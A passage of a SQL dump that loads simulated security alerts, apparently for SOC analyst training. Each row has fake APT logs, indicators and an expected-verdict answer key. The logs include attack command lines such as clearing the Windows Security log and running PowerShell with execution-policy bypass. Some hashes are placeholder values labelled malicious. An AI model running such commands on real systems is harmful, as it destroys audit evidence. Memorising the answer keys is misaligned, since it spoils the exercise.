Files\\\\LegitApp\\\\msvcr110.dll\",\"malicious_dll_path\":\"C:\\\\Temp\\\\msvcr110.dll\",\"executing_user\":\"jdoe\",\"source_ip\":\"192.168.1.45\",\"attacker_ip\":\"203.0.113.45\",\"hash_malicious_dll\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malware_name\":\"APT10_SideLoad\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"filename\",\"value\":\"msvcr110.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a malicious DLL used in side-loading attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT10_SideLoad malware.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known command and control server for APT10 operations.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account on the network.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (391, 'Establishing Persistence with Backdoor Implant', 'high', 'System Registry Changes', 'APT10 has been detected establishing long-term persistence by deploying a backdoor implant within the aerospace company\'s network. The attack involved registry modifications pointing to a malicious service executable.', 'Persistence', 'T1050: New Service', 1, 'new', NULL, '{\"time\":\"2023-09-15T14:23:45Z\",\"event_id\":7045,\"source_ip\":\"203.0.113.5\",\"internal_ip\":\"192.168.1.20\",\"user\":\"jdoe\",\"registry_key\":\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\MaliciousService\",\"service_name\":\"MaliciousService\",\"image_path\":\"C:\\\\Windows\\\\System32\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"Service Installed\",\"description\":\"A new service was installed on the machine to maintain persistence.\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Sandbox\",\"verdict\":\"malicious\",\"details\":\"Executable file used by APT10 for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT10 malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used during the attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (392, 'Lateral Movement to Access Design Servers', 'high', 'Network Traffic Analysis', 'During the investigation of unusual network patterns, it was identified that a malicious entity performed lateral movement within the corporate network to access critical design servers. The attackers employed techniques consistent with the APT10 group\'s TTPs, leveraging compromised credentials to gain unauthorized access to servers containing sensitive CAD files. This alert represents step 4 of the operation where the attackers successfully reached the target servers.', 'Lateral Movement', 'T1080: Taint Shared Content', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:18Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.45\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"j.doe@company.com\",\"accessed_file\":\"designServerAccess.log\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"lateral_move\",\"result\":\"success\",\"protocol\":\"SMB\",\"malware\":\"CloudHopper\",\"description\":\"Lateral movement detected towards design server using stolen credentials.\",\"os\":\"Windows Server 2019\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP involved in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target design server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with APT10.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CloudHopper malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"designServerAccess.log\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Log file accessed during lateral movement.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Compromised user account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'NULL', 1, 0, NULL), (393, 'Data Collection from CAD Repositories', 'high', 'File Access Logs', 'APT10 is actively collecting large CAD files from compromised servers within the aerospace sector. This operation stage focuses on aggregating these files for planned exfiltration.', 'Collection', 'T1119 - Automated Collection', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:47Z\",\"event_id\":\"file_access_8765\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"user\":\"j.doe\",\"access_type\":\"read\",\"file_name\":\"aerospace_project_design.cad\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_size\":\"15MB\",\"protocol\":\"SMB\",\"action\":\"access_granted\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 IP involved in previous aerospace sector attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"aerospace_project_design.cad\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive CAD file targeted by APT10.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"Common placeholder hash, needs further investigation for exact matches.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (394, 'Exfiltration of CAD Files via Encrypted Channels', 'high', 'Outbound Network Traffic', 'APT10 is utilizing encrypted channels to exfiltrate CAD files from the network. The operation involves transferring data to a known malicious external IP using SSL/TLS encryption, making detection challenging.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"exfil-20231012-001\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"TLS\",\"encrypted_data_size\":\"15MB\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"filename\":\"designs_v3_aggregated.zip\",\"user\":\"jdoe\",\"process_name\":\"explorer.exe\",\"indicator_of_compromise\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\"},{\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\"},{\"type\":\"filename\",\"value\":\"designs_v3_aggregated.zip\"}],\"alert_description\":\"Observed encrypted data transfer to a known malicious IP associated with APT10.\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT10 infrastructure component.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"designs_v3_aggregated.zip\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"File name pattern matches previous exfiltration attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (395, 'Clean-up and Cover Tracks', 'high', 'System Event Logs', 'The attackers attempted to erase logs and artifacts to obscure their presence and activities within the network. This is a typical step in their operation to remove traces of intrusion.', 'Defensive Evasion', 'T1070', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:22:35Z\",\"event_id\":4625,\"event_type\":\"Security\",\"action\":\"Log Deletion\",\"username\":\"admin_user\",\"host_ip\":\"10.0.0.15\",\"source_ip\":\"203.0.113.45\",\"log_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"process\":\"wevtutil.exe\",\"command_line\":\"wevtutil cl Security\"}', '2026-01-04 02:14:19', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT10 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potential malicious activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (396, 'Suspicious Network Activity Detected', 'high', 'Network Intrusion Detection System (NIDS)', 'Initial access attempt identified through a phishing email containing a malicious link, typically used by the Whitefly group. The email was sent to an internal user and contained a link leading to the download of a malicious payload.', 'Initial Access', 'T1566.001 - Spearphishing Link', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"protocol\":\"HTTP\",\"url\":\"http://malicious-example.com/download\",\"email_sender\":\"hacker@example.com\",\"email_recipient\":\"user@internal.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"file_hash\":\"2b8e5d8f7e9c4f8a9b6e5d9f7c6b8e5d\",\"filename\":\"invoice.pdf\",\"alert\":\"Phishing Link Detected\",\"ids_reference\":\"NIDS-2345\"}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with previous phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by phishing email.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-example.com/download\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware URL Database\",\"verdict\":\"malicious\",\"details\":\"URL hosting a known malicious payload.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"hacker@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address associated with phishing activities.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"2b8e5d8f7e9c4f8a9b6e5d9f7c6b8e5d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash identified as a malicious payload.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (397, 'Execution of Malicious Script', 'high', 'Endpoint Detection and Response (EDR)', 'An advanced malicious script execution was detected on the endpoint, aiming to establish a foothold by deploying the Vcrodat malware. The script was initially downloaded via a phishing link.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:08Z\",\"event_type\":\"execution\",\"host\":{\"hostname\":\"compromised-endpoint\",\"ip\":\"192.168.1.105\"},\"user\":\"jdoe\",\"process\":{\"name\":\"powershell.exe\",\"pid\":4567,\"command_line\":\"powershell -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\"},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\"},\"network\":{\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":80},\"malware\":{\"name\":\"Vcrodat\",\"signature_version\":\"1.2.3\",\"hash\":\"6a2da3a46e0f4e8b8a7d4b2a2c8e7a5f\"}}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malware distribution.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash detected in previous malware incidents.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"6a2da3a46e0f4e8b8a7d4b2a2c8e7a5f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches the Vcrodat malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename typically used in phishing attacks.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (398, 'Vcrodat Malware Persistence Mechanism', 'high', 'System Logs', 'The Vcrodat malware has been observed manipulating registry keys for persistence. This is a known tactic of the Whitefly group to ensure continuous access to compromised systems. The malware modifies the registry key to execute a malicious payload upon system startup.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:21Z\",\"source_ip\":\"103.245.222.133\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\MaliciousApp\",\"registry_value_name\":\"MaliciousApp\",\"registry_value_data\":\"C:\\\\Windows\\\\System32\\\\ncsvc.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"process_id\":4824,\"process_name\":\"ncsvc.exe\"}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"103.245.222.133\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with Vcrodat malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ncsvc.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Malicious executable used for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"User\'s account may be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (399, 'Compromised Open-Source Tool Identified', 'high', 'Open-Source Intelligence (OSINT)', 'An open-source tool frequently used by developers has been modified to include malicious code. The tool is leveraging legitimate traffic patterns to avoid detection by security systems. The malicious code attempts to establish a connection with a known malicious IP and downloads additional payloads.', 'Defense Evasion', 'T1562.001 - Impair Defenses: Disable or Modify Tools', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:25:36Z\",\"event_id\":\"EVT-1004\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"tool_name\":\"OpenSourceDevTool\",\"malicious_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"file_path\":\"/usr/local/bin/OpenSourceDevTool\",\"action\":\"download\",\"payload_url\":\"http://malicious.example.com/payload\",\"status\":\"success\"}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware signature\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/usr/local/bin/OpenSourceDevTool\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"Modified version of a known open-source tool\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious.example.com/payload\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"URL hosting malicious payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (400, 'Unauthorized Credentials Accessed', 'high', 'Security Information and Event Management (SIEM)', 'Compromised credentials were used by the attacker to perform lateral movement within the network. The attacker, associated with the Whitefly group, utilized stolen credentials to access multiple systems, potentially exfiltrating sensitive data.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_type\":\"authentication\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"jdoe_admin\",\"action\":\"login_success\",\"details\":{\"method\":\"RDP\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"whitefly_tool.exe\"},\"network\":{\"src_port\":3389,\"dest_port\":3389}}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Whitefly APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address within corporate network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"Admin account used in unauthorized manner.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a tool used by Whitefly for lateral movement.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"whitefly_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"File used in conjunction with Whitefly\'s attack strategies.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'NULL', 1, 0, NULL), (401, 'Unusual Data Access Patterns Detected', 'high', 'Data Loss Prevention (DLP)', 'Sensitive patient data and proprietary information from materials science research were accessed in a manner indicative of preparation for data exfiltration. The activity was detected originating from an internal network, accessing multiple sensitive files in quick succession, and communicating to an external IP address known for malicious activities.', 'Collection', 'T1119', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"dlp-collection-56789\",\"source_ip\":\"10.1.1.5\",\"destination_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"accessed_files\":[\"/research/patient_data/sensitive_data.xlsx\",\"/research/materials_science/proprietary_formula.docx\"],\"file_hashes\":[\"d41d8cd98f00b204e9800998ecf8427e\",\"5eb63bbbe01eeed093cb22bb8f5acdc3\"],\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"alert_reason\":\"Multiple sensitive files accessed and malware hash detected.\"}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR Database\",\"verdict\":\"internal\",\"details\":\"Employee of the company.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with data exfiltration malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (402, 'Data Exfiltration Attempt Blocked', 'high', 'Firewall Logs', 'A detected attempt to transfer data to an external server was blocked. This represents the final stage of a sophisticated attack, indicating a potential breach.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:47:23Z\",\"firewall_id\":\"FW-12345\",\"action\":\"blocked\",\"source_ip\":\"10.0.15.23\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"username\":\"jdoe\",\"filename\":\"confidential_data.zip\",\"file_hash\":\"9e107d9d372bb6826bd81d3542a419d6\",\"policy_rule\":\"Block_Exfiltration_Attempts\",\"detection_method\":\"anomaly_detection\",\"alert_id\":\"alert-98765\",\"additional_info\":{\"attempted_bytes_transferred\":2048000,\"malware_family\":\"APT29\"}}', '2026-01-04 02:15:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host attempting unauthorized data transfer.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9e107d9d372bb6826bd81d3542a419d6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious exfiltration tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file format detected in unauthorized transfer 